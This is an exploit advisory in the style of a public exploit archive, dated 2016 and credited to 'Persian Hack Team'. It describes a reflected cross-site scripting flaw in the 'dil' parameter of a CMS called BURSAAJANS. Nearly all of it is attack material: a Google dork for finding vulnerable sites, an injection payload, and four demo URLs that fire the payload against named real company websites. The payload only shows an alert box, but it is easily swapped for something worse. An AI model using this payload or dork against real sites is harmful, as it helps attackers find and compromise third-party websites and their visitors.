######################
# Exploit Title : BURSAAJANS Company Cms Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.bursaajans.com/
# Google Dork : intext:Designed by BURSAAJANS inurl:dil=
# Date: 2016/03/14
######################
# PoC:
# dil=[XSS]
# Payload = '><img onerror=alert(1) src="asd">
# Demo :
#
# http://www.goymen.com.tr/anasayfa.php?dil=en%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
# http://www.doyummakarna.com.tr/anasayfa.php?dil=en%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
# http://www.dastechairspring.com/urun.php?dil=en%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
# http://www.acartextile.com.tr/anasayfa.php?dil=fr%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################